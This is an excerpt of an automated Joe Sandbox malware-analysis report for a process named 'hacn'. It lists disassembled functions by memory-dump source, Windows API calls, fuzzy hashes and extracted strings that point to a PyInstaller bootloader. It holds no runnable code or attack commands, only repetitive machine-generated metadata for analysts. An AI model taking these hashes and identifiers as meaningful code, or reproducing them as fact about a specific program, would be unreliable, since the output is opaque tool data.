                                                                                          • API String ID: 2920928814-2573406579
                                                                                          • Opcode ID: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                                          • Instruction ID: 2b175daff84126e2e5470b6c47678a290505972b04f97cbdd9865a6c9ae8c91e
                                                                                          • Opcode Fuzzy Hash: f8b909e9681ff6aa95198e912ee695dc1f7db9a724790c30e57e4941c2966439
                                                                                          • Instruction Fuzzy Hash: AA217CB1A0CA42D1FB60BB11E89427A7261FF98388FC44036EE4DC26A5EF3CE515C748
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID: -$:$f$p$p
                                                                                          • API String ID: 3215553584-2013873522
                                                                                          • Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                          • Instruction ID: eac9462fa0efbf066602fd070886ee1b16f601fb0ef18af63d955fa33ae212e6
                                                                                          • Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                          • Instruction Fuzzy Hash: B512E522E0C243E6FB20BB15D1946B97662FB40754FC64836EE89C76C6DF3DE5908B18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                          • API String ID: 2030045667-3659356012
                                                                                          • Opcode ID: e5108cce18930c95ec008cab12b74f468bca2247a7531e4dfde3010c4de9cf3f
                                                                                          • Instruction ID: 0098cb2bc65728989ddff275ecabbb4f4c6411225f8137bafbdaf2c2c14503a1
                                                                                          • Opcode Fuzzy Hash: e5108cce18930c95ec008cab12b74f468bca2247a7531e4dfde3010c4de9cf3f
                                                                                          • Instruction Fuzzy Hash: 8A319C61B0C642C6FA20BB11E4105BAA3A0FF547C8FD88432DE5DC7AA5EE3DF5458708
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 849930591-393685449
                                                                                          • Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                          • Instruction ID: fb3b19abf260c39d3741d76d437e92e01dc4b9aadb5166a0e23c9495410de810
                                                                                          • Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                          • Instruction Fuzzy Hash: 64E18C32A0CB41CAEB20BB3594402AD77A0FB45B88F944536EE8D97B95CF78F191C704
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647778847
                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF64777889E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide
                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                          • API String ID: 626452242-27947307
                                                                                          • Opcode ID: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
                                                                                          • Instruction ID: 69909ac49b06bbb8304eea58c049ff8cb033e3d65e2a959de34446c0b093647b
                                                                                          • Opcode Fuzzy Hash: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
                                                                                          • Instruction Fuzzy Hash: 2C416A32A0DB82C2E660FB15E84017AB7A1FB88790F944136DE9D87B94EF3CE555C708
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF6477739EA), ref: 00007FF647778D31
                                                                                            • Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
                                                                                            • Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0
                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF6477739EA), ref: 00007FF647778DA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                          • API String ID: 3723044601-27947307
                                                                                          • Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                          • Instruction ID: 68fa1ed17ea5b2493572fe1ac4ccf8a5a9480733054a1ec2dd3541dddbb37cfa
                                                                                          • Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                          • Instruction Fuzzy Hash: BD216D71A0DB42D5EA10BB16E9800797661EB98B80F984536DE4D83794EF3CE5118348
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                          • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                          • API String ID: 3231891352-3501660386
                                                                                          • Opcode ID: 683f7c82ee051074cc98c03ba619693d069a064928b9b5f33fff0d752aabab01
                                                                                          • Instruction ID: 8bfd4056a062da357d29fe61e1ca6866c5d80c7df3cb5fb0466ef86b11323332
                                                                                          • Opcode Fuzzy Hash: 683f7c82ee051074cc98c03ba619693d069a064928b9b5f33fff0d752aabab01
                                                                                          • Instruction Fuzzy Hash: 5351AE61A0D643C5FA60BB25E9412B96299DF85BC4FD84531EE0DCB7DAEE6CF40083D8
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DF3D
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DF4B
                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DF75
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DFBB
                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF64777E16A,?,?,?,00007FF64777DE5C,?,?,00000001,00007FF64777DA79), ref: 00007FF64777DFC7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 2559590344-2084034818
                                                                                          • Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                          • Instruction ID: 870770a4ec577a68dbb1e8cb0a4c5119b0ad5b221eee9116bd8aa9ed956c3465
                                                                                          • Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                          • Instruction Fuzzy Hash: 6F31C421A1EB42D5FE11BB02A8005792394FF48BA4F9A4936DD2DDB798DF3CF4558318
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6477779B1,00000000,?,00000000,00000000,?,00007FF64777154F), ref: 00007FF64777748F
                                                                                            • Part of subcall function 00007FF647772B30: MessageBoxW.USER32 ref: 00007FF647772C05
                                                                                          Strings
                                                                                          • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6477774A3
                                                                                          • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF647777466
                                                                                          • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6477774EA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                          • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                          • API String ID: 1662231829-3498232454
                                                                                          • Opcode ID: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
                                                                                          • Instruction ID: 2cb88a090720b34a43a1b905860f8ee4d86d51261d8ab07e9f076ddd66ad8c63
                                                                                          • Opcode Fuzzy Hash: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
                                                                                          • Instruction Fuzzy Hash: D131C451B1D782C1FA20BB25E9563BA5295EF987C0FC44432DE4EC67A6FE2CF1048748
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A
                                                                                            • Part of subcall function 00007FF6477729E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
                                                                                            • Part of subcall function 00007FF6477729E0: MessageBoxW.USER32 ref: 00007FF647772AF0
                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778CA0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                          • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                          • API String ID: 3723044601-876015163
                                                                                          • Opcode ID: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                                          • Instruction ID: ccccf3c99b99a7c51e135570c727594b1777c9cb4cc2d9649b2ac84be263fb35
                                                                                          • Opcode Fuzzy Hash: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                                          • Instruction Fuzzy Hash: EF217E62B0DA42C1EB50FB29F941069A3A1FB987C4F984135DF5CD3BA9EE2CE5418708
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2506987500-0
                                                                                          • Opcode ID: 314b1dd63a8d17b6b9fe49a3dc008a2d89e42ef813efa06f0dff02a3ee6b6398
                                                                                          • Instruction ID: 6aaf654db9f71a66757f6bfcd9d0e505c79b474684c57e11098f5748c7d05c39
                                                                                          • Opcode Fuzzy Hash: 314b1dd63a8d17b6b9fe49a3dc008a2d89e42ef813efa06f0dff02a3ee6b6398
                                                                                          • Instruction Fuzzy Hash: 31215B20F0C242C2FA687371DA5617962425F447B0FD64738DD3EC66E6DE6CA401434A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                          • String ID: CONOUT$
                                                                                          • API String ID: 3230265001-3130406586
                                                                                          • Opcode ID: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                                          • Instruction ID: 9a1f0133f288e4484b8432d50cd8713d8e3837566a8d52f58f9cec86c04fb804
                                                                                          • Opcode Fuzzy Hash: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                                          • Instruction Fuzzy Hash: 6D118161A1CB41C6F750BB56E85472962A0FB98FE4F844234DE1DC77A4CF7CD8448748
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                          • String ID: csm$f
                                                                                          • API String ID: 2395640692-629598281
                                                                                          • Opcode ID: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                                          • Instruction ID: ce294d502bd7196732f3973a87bee7a6d9917f19c9420ab95b7dea37d1113912
                                                                                          • Opcode Fuzzy Hash: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
                                                                                          • Instruction Fuzzy Hash: 47517F32A1D602CAEB14BB15E404A7937A5FB80B98F91C532DE4A97748EF38F941C708
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                          • String ID: Unhandled exception in script
                                                                                          • API String ID: 3081866767-2699770090
                                                                                          • Opcode ID: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
                                                                                          • Instruction ID: 97fb6b9b0423a835b016c7e0353e9c46e3296dd6abca2cffa33a4d0a73ea15c6
                                                                                          • Opcode Fuzzy Hash: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
                                                                                          • Instruction Fuzzy Hash: 11312C72A1DA82C9EB20FB65E9551F96360FF88B84F800135EE4D8BA69DF3CD105C744
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6477788F2,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647772A14
                                                                                            • Part of subcall function 00007FF647778570: GetLastError.KERNEL32(00000000,00007FF647772A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF64777101D), ref: 00007FF647778597
                                                                                            • Part of subcall function 00007FF647778570: FormatMessageW.KERNEL32 ref: 00007FF6477785C6
                                                                                            • Part of subcall function 00007FF647778BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF647772ABB), ref: 00007FF647778C1A
                                                                                          • MessageBoxW.USER32 ref: 00007FF647772AF0
                                                                                          • MessageBoxA.USER32 ref: 00007FF647772B0C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                          • String ID: %s%s: %s$Fatal error detected
                                                                                          • API String ID: 2806210788-2410924014
                                                                                          • Opcode ID: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                                          • Instruction ID: fe583392fee345c8133f6fa404efd6fa49ec3fbf1d4dd5d83e4e29a8e7bebf98
                                                                                          • Opcode Fuzzy Hash: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
                                                                                          • Instruction Fuzzy Hash: EB311E7262CA82D1E630BB10E4516EA6364FB957C4F804136EA8D92AA9DF3CE605CB44
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                                          • Instruction ID: 1769539e03ac3c549bd58630911d162782306b4eb40f94f9e8c948f5d1a63423
                                                                                          • Opcode Fuzzy Hash: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
                                                                                          • Instruction Fuzzy Hash: 91F04F61B1E702C1FB20BB24E8457796320AF98BA1F951635CE6E865F4CF2CD4498348
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
